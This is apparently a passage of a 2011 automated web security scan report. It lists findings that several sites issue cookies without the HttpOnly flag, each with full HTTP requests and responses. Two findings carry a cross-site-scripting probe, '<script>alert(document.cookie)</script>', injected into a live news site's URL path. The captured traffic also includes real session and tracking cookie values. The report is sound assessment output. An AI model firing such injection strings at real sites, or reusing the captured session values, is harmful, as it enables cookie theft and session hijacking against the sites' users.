Set-cookie: sf.consume=8700121d2e69d73420eb7360565fa0b13958dd8dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMGViMTAwMGM2MXEKVQNfaWRxC1UgNzljMTAxOWFiMWI4MWUzOGJmOGZmM2ZjMGJkNzllMWZxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009ophg07FUOX2NyZWF0aW9uX3RpbWVxDkdB009ophg0EXUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 40706
Access-Control-Allow-Origin: *

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Consume Server: sfs-consume-2 -->
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

14.576. http://sourceforge.net/projects/trn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/trn/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • sf.consume=9d302353afe3de71a0a2ec3d7914c1a46ba28173gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMTExYTAwMGFmMXEKVQNfaWRxC1UgMTkwODg5YjVhNTI4OWJkNDQ2OTE1ZGU4OGY3MDM4MmRxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009optJ41VUOX2NyZWF0aW9uX3RpbWVxDkdB009optJ4GHUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/trn/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: VISITOR=4d3da298dab0ca111a000af1; expires="Thu, 21-Jan-2021 16:02:35 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=9d302353afe3de71a0a2ec3d7914c1a46ba28173gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMTExYTAwMGFmMXEKVQNfaWRxC1UgMTkwODg5YjVhNTI4OWJkNDQ2OTE1ZGU4OGY3MDM4MmRxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009optJ41VUOX2NyZWF0aW9uX3RpbWVxDkdB009optJ4GHUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 37454
Access-Control-Allow-Origin: *

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Consume Server: sfs-consume-2 -->
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

14.577. http://spongecell.com/api/events/915725/buy_tickets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spongecell.com
Path:   /api/events/915725/buy_tickets

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/events/915725/buy_tickets HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
Status: 500 Internal Server Error
Cache-Control: max-age=60
Content-Length: 23

No ticket url specified

14.578. http://spongecell.com/api/widgets/clickthrough/264001

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spongecell.com
Path:   /api/widgets/clickthrough/264001

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/widgets/clickthrough/264001 HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:17:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
Status: 302 Found
Location: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=20&mc=click&pli=2150004&PluID=0&ord=[timestamp]
Cache-Control: max-age=60
Content-Length: 172

<html><body>You are being <a href="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=20&mc=click&pli=2150004&PluID=0&ord=[timestamp]">redirected</a>.</body></html>

14.579. http://spongecell.com/event_list

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spongecell.com
Path:   /event_list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event_list HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
Status: 200 OK
Cache-Control: no-cache
Content-Length: 10097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...

14.580. http://spongecell.com/event_page/view/915725

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spongecell.com
Path:   /event_page/view/915725

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • _spongecell_loves_u=BAh7CDoJa2V5c1sAOgtsb2NhbGUiCmVuLVVTIgpmbGFzaElDOidBY3Rpb25D%250Ab250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6CW5vdGUwBjoKQHVzZWR7%250ABjsIVA%253D%253D--5f6777943aa1e5d6b4a2cab61b42984a90431a22; domain=.spongecell.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event_page/view/915725 HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: _spongecell_loves_u=BAh7CDoJa2V5c1sAOgtsb2NhbGUiCmVuLVVTIgpmbGFzaElDOidBY3Rpb25D%250Ab250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6CW5vdGUwBjoKQHVzZWR7%250ABjsIVA%253D%253D--5f6777943aa1e5d6b4a2cab61b42984a90431a22; domain=.spongecell.com; path=/
Status: 302 Found
Location: http://spongecell.com/event/view/915725
Cache-Control: no-cache
Content-Length: 105

<html><body>You are being <a href="http://spongecell.com/event/view/915725">redirected</a>.</body></html>

14.581. http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Origin: http://starscene.dailystar.com.lb
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510
Content-Length: 40

ak_action=api_record_view&ids=&type=home

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3
Content-Type: application/json
Content-Length: 39

{"result":false,"ids":"","type":"home"}

14.582. http://stats.dailystar.com.lb/piwik.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.dailystar.com.lb
Path:   /piwik.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • piwik_visitor=2%3DeyI4IjozLCI5IjoiYnVycCIsIjEwIjpmYWxzZSwiNiI6IjExNjcyNzEiLCI3IjoxMjk1OTAzNTAzLCIxIjoiZGU3ODM5NTA5MTdiYTQ1NThjNDA4NzNlYTNlZTFiNWEiLCIyIjoxMjk1OTAzNTAzLCIzIjoxMjk1OTAzNTAzLCI0IjoiMTE2NzI3MSIsIjUiOiIzMTMxNjkiLCIxMSI6MH0%3D%3A_%3D56d7103d07c8fb280920e65bd6d3a9c6aae4566e; expires=Wed, 23-Jan-2013 21:11:43 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /piwik.php?idsite=2&rec=1&rand=0.49300097208470106&h=15&m=12&s=27&url=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&urlref=http%3A%2F%2Fburp%2Fshow%2F35&res=1920x1200&cookie=1&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=1&java=1&gears=1&ag=1&action_name=Nothing%20found%20for%20Music-scenea960d%22%3E%3Cscript%3Ealert(document%20Cookie)%3C%20Script%3Eb7d5247b69c%202010%2011%20Pianist-geoffrey-saba-performs-at-aubs-assembly-hall%20X22 HTTP/1.1
Host: stats.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
P3P: CP='OTI DSP COR NID STP UNI OTPa OUR'
Set-Cookie: piwik_visitor=2%3DeyI4IjozLCI5IjoiYnVycCIsIjEwIjpmYWxzZSwiNiI6IjExNjcyNzEiLCI3IjoxMjk1OTAzNTAzLCIxIjoiZGU3ODM5NTA5MTdiYTQ1NThjNDA4NzNlYTNlZTFiNWEiLCIyIjoxMjk1OTAzNTAzLCIzIjoxMjk1OTAzNTAzLCI0IjoiMTE2NzI3MSIsIjUiOiIzMTMxNjkiLCIxMSI6MH0%3D%3A_%3D56d7103d07c8fb280920e65bd6d3a9c6aae4566e; expires=Wed, 23-Jan-2013 21:11:43 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.583. http://su.addthis.com/red/usync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://su.addthis.com
Path:   /red/usync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; Domain=.addthis.com; Expires=Thu, 24-Jan-2013 01:35:49 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/usync?pid=2&puid=914803576615380,rcHW800iZiMAAocf HTTP/1.1
Host: su.addthis.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; uid=4d1ec56b7612a62c; psc=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; Domain=.addthis.com; Expires=Thu, 24-Jan-2013 01:35:49 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Content-Type: image/png
Content-Length: 67
Date: Tue, 25 Jan 2011 01:35:49 GMT
Connection: close

.PNG
.
...IHDR.............:~.U...
IDATx.c`......H..q....IEND.B`.

14.584. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ANRTT=60848^1^1296494968|62722^1^1296508004; path=/; expires=Mon, 31-Jan-11 21:06:44 GMT; domain=tacoda.at.atwola.com
  • Tsid=0^1295903204^1295905004|17295^1295903204^1295905004; path=/; expires=Mon, 24-Jan-11 21:36:44 GMT; domain=tacoda.at.atwola.com
  • TData=99999|^|56780|60739|#|60848|62722; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
  • N=2:71e5fe306b3f97af479b09e96a0ca00a,3c9757ed1e17089910d4221c9c7e35f4; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
  • ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=.at.atwola.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=AGU&si=17295&pi=M&xs=3&pu=http%253A//www.autobytel.com/x22%2526ifu%253Dhttp%25253A//burp/show/31&v=5.5&cb=96663 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=60848^1^1296494968; TData=99999|^|56780|60739|#|60848; Anxd=x; N=2:faabfca985572b481d74a4897e4d9013,71e5fe306b3f97af479b09e96a0ca00a; ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg=

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:06:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 24 Jan 2011 21:21:44 GMT
Set-Cookie: ANRTT=60848^1^1296494968|62722^1^1296508004; path=/; expires=Mon, 31-Jan-11 21:06:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1295903204^1295905004|17295^1295903204^1295905004; path=/; expires=Mon, 24-Jan-11 21:36:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|56780|60739|#|60848|62722; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Tue, 25-Jan-11 03:06:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:71e5fe306b3f97af479b09e96a0ca00a,3c9757ed1e17089910d4221c9c7e35f4; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 128
Content-Type: application/x-javascript
Content-Length: 128

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|56780|60739|#|60848|62722';
ANRTXR();


14.585. http://tags.bluekai.com/site/10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/10

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • bk=Sbr2orXnuT6sHNJo; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
  • bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
  • bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
  • bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
  • bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJ0fyXF9XJlJlJKHRH/q9T1wLfAFvT1AcyBe3gTVD9y9Uh9aYy==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCx8Vs/gFfw0GIU4J1ufsW6ue6EytNEOGRGe0XtExLxebEKLRWOEvz61pOXhbJFah1e9pBe3EDeyT3qbfCTgWet1w9011QZ1evAbZ+ONx49NDLpQPD9xj9OLh19DDoQSQ==; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxgyXR9wBpxh1n/6LnutBe/6+e9pBMRtwNJFf9QY26izl; bk=dOTA6tBCxZ/sHNJo; bkc=KJhnRtPQrOgmyceoM3DF/y1exh3xnXsn0G2Cx4O8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImc1DeTdkeISiT/dfKyoiXpxT1+isd5iLg4FO7OgTKb+T9jGCdWM64MdTC9XYmj/Kol18Ae2EmOIzt03wyah3MXCVMXvePsmwXeNn6wZueZQdQOlvCX83IGdO8tHMi47hridpRulXLRk4dLs0o4VJGHpA2ACmMd+XF9ky7v72KBTewyxrHE2qU9bAaXh68DdkDPHCEIUMPDF3xbv+dS9jUFQzSUEDeyK2QC27XahCK1qhIc0759TXFV/FicGmsg7vRW82+hGdJ8eicT7WYIRy13wbDjkq2FmG/w9BZIKeT=

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:06:44 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=Sbr2orXnuT6sHNJo; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
